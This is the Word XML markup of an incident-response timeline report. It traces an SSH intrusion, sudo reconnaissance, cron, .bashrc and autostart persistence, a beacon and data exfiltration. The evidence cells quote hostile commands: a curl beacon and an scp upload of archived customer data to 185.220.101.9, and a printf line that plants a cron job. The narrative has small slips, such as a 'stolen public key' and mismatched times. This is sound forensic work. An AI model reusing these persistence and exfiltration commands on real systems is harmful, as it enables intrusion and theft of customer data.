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Stage 3 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Incident Timeline</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SpicyMeatball41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">UBI-2026-0257</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIMELINE TABLE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="108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025"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="2370"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2745"/>
            <w:gridCol w:w="2025"/>
            <w:gridCol w:w="1860"/>
            <w:gridCol w:w="1860"/>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Stamp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Source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Evidence (grep line/PID/row)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2024-06-04T02:07:55Z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SSH login from 185.220.101.9 (Tor exit pool, non-corporate ASN) accepted for o.adegoke on pts/3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03-syslog.txt; 04-siem-export.csv row 2; 06-netflow.csv row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sshd[1872]: Accepted publickey for o.adegoke from 185.220.101.9; netflow: 185.220.101.9:51432 → 10.0.1.87:22 TCP SA 1840/2210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2024-06-04T02:09:14Z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Privilege escalation (recon)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Attacker reads /var/log/auth.log via sudo less — first use of the NOPASSWD sudoers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03-syslog.txt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sudo: o.adegoke : TTY=pts/3 PWD=/home/o.adegoke USER=root COMMAND=/usr/bin/less /var/log/auth.log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2024-06-04T02:11:02Z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Privilege escalation (recon)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Attacker reads /etc/sudoers.d/90-ops via sudo less — confirms escalation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03-syslog.txt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sudo: o.adegoke : TTY=pts/3 PWD=/home/o.adegoke USER=root COMMAND=/usr/bin/less /etc/sudoers.d/90-ops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2024-06-04T02:12:50Z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Privilege escalation (recon)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Attacker reads /var/log/syslog via sudo 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03-syslog.txt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sudo: o.adegoke : TTY=pts/3 PWD=/home/o.adegoke USER=root COMMAND=/usr/bin/less /var/log/syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="108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025"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="2370"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2745"/>
            <w:gridCol w:w="2025"/>
            <w:gridCol w:w="1860"/>
            <w:gridCol w:w="1860"/>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2024-06-04T02:13:11Z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.helper executed for first time; .bashrc modified to source it on every shell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03-syslog.txt; 04-siem-export.csv row 3; 02-filesystem-index.txt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kernel: [audit] EXECVE bash /var/lib/mc/.helper; SIEM: New executable in /var/lib/mc/ outside any known package; .bashrc mtime Jun 4 02:13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2024-06-04T02:14:00Z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Cron reloaded — ephemeral /etc/cron.d/.cache-update entry (*/3 * * * * root /var/lib/mc/.helper) written then deleted; cron daemon retains it in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03-syslog.txt; 04-siem-export.csv row 4; 05-memory-strings.txt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cron[2417]: (root) RELOAD (cron); SIEM: Cron reloaded but no /etc/cron.d/* changed by package manager; memory strings: printf '*/3 * * * * root /var/lib/mc/.helper\n' &gt; /etc/cron.d/.cache-update then rm -f /etc/cron.d/.cache-update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2024-06-04T02:14:00Z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.config/autostart/.boot.desktop written — catches GUI logins that .bashrc would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02-filesystem-index.txt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/home/o.adegoke/.config/autostart/.boot.desktop mtime Jun 4 02:14, size 38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2024-06-04T02:15:02Z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First cron-triggered beacon: curl POST to 185.220.101.9 with workstation:root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03-syslog.txt; 04-siem-export.csv row 5; 06-netflow.csv row 10; 01-process-listing.txt PID 2031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CRON[2455]: (root) CMD (/var/lib/mc/.helper); SIEM: Curl POST to known-bad IP; netflow: 10.0.1.87:45888 → 185.220.101.9:443 TCP 612/980 bytes; PID 2031 ppid=2019 curl -sfm 10 https://185.220.101.9/beacon -d workstation:root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="1077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85"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="2250"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2715"/>
            <w:gridCol w:w="2085"/>
            <w:gridCol w:w="1860"/>
            <w:gridCol w:w="186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2024-06-04T02:18:01Z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Second cron-triggered beacon to 185.220.101.9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03-syslog.txt; 06-netflow.csv row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CRON[2502]: (root) CMD (/var/lib/mc/.helper); netflow: 10.0.1.87:45910 → 185.220.101.9:443 TCP 606/972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2024-06-04T02:31:55Z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Exfiltration (staging)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tar archives customers.csv (8.9KB) and transactions.csv (11.4KB) into /tmp/exfil.tgz (20KB)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03-syslog.txt; 04-siem-export.csv row 6; 02-filesystem-index.txt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kernel: [audit] EXECVE tar czf /tmp/exfil.tgz /tmp/customers.csv /tmp/transactions.csv; SIEM: tar created from /tmp/customers.csv + /tmp/transactions.csv; filesystem: /tmp/exfil.tgz mtime Jun 4 03:01 size 20352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2024-06-04T03:01:18Z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scp transfers /tmp/exfil.tgz to attacker@185.220.101.9:/dropbox/ — confirmed data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03-syslog.txt; 04-siem-export.csv row 7; 06-netflow.csv row 25; 01-process-listing.txt PID 3211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kernel: [audit] EXECVE scp /tmp/exfil.tgz attacker@185.220.101.9:/dropbox/; SIEM: scp from /tmp/exfil.tgz to remote IP — unauthorised destination; netflow: 10.0.1.87:52118 → 185.220.101.9:22 TCP 31244/1420 bytes PA; PID 3211 ppid=1882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2024-06-04T03:04:22Z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Exfiltration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SSH session 14 closed — attacker disconnects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03-syslog.txt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systemd-logind[1488]: Removed session 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="1077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085"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="1860"/>
        <w:gridCol w:w="2250"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2715"/>
            <w:gridCol w:w="2085"/>
            <w:gridCol w:w="1860"/>
            <w:gridCol w:w="186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2024-06-05T03:14:25Z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Re-entry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Second SSH session from same IP 185.220.101.9 — attacker returns; beacon fires again (PID 4192)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03-syslog.txt; 04-siem-export.csv row 8; 01-process-listing.txt PID 4188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sshd[4188]: Accepted publickey for o.adegoke from 185.220.101.9; PID 4188 ppid=1 root /var/lib/mc/.helper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2024-06-06T09:00:47Z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Re-entry (new source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Third SSH session — accepted for o.adegoke from different IP 102.89.34.17 — possible second operator or IP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03-syslog.txt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sshd[6042]: Accepted publickey for o.adegoke from 102.89.34.17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2024-06-08T04:08:11Z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Containment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Tunde isolates host: sshd stopped, nft input drop policy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03-syslog.txt; 04-siem-export.csv row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systemd[1]: sshd.service: Deactivated successfully; nft[8801]: input drop policy applied (network isolation); SIEM: host-quarantined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LATERAL MOVEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> No lateral movement confirmed from 10.0.1.87. The SMB flow (10.0.2.14 → 10.0.3.20:445), RDP flow (10.0.1.42 → 10.0.3.15:3389), and Postgres flow (10.0.4.8 → 10.0.3.22:5432) all originate from other hosts and fall outside the attacker's session window on 10.0.1.87. They are background traffic and are not attributed to this incident.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker breached the system by stealing an SSH public key at 02:07:55, and immediately leveraged a pre-installed NOPASSWD sudoers misconfiguration to read privilege control files. Within six minutes, the attacker had made the .helper beacon executable, backdoored the .bashrc file, made an ephemeral cron task (and deleted it later to minimize the footprint but keep the task running via cron only), and made a GUI autostart entry – three types of persistence mechanism on shell, cron and desktop login respectively. After successfully installing the root level beacons, which were confirmed by the C2 communication, they moved the customer and transaction data to /tmp folder, archived it, and stole approximately 20KB of that via SCP to the C2 IP address at 03:01:18 – just one hour since the first breach. The attacker continued to silently beacon through two more attack sessions, on June 5 and June 6 (from a different source IP in the latter case), till Tunde isolated it on June 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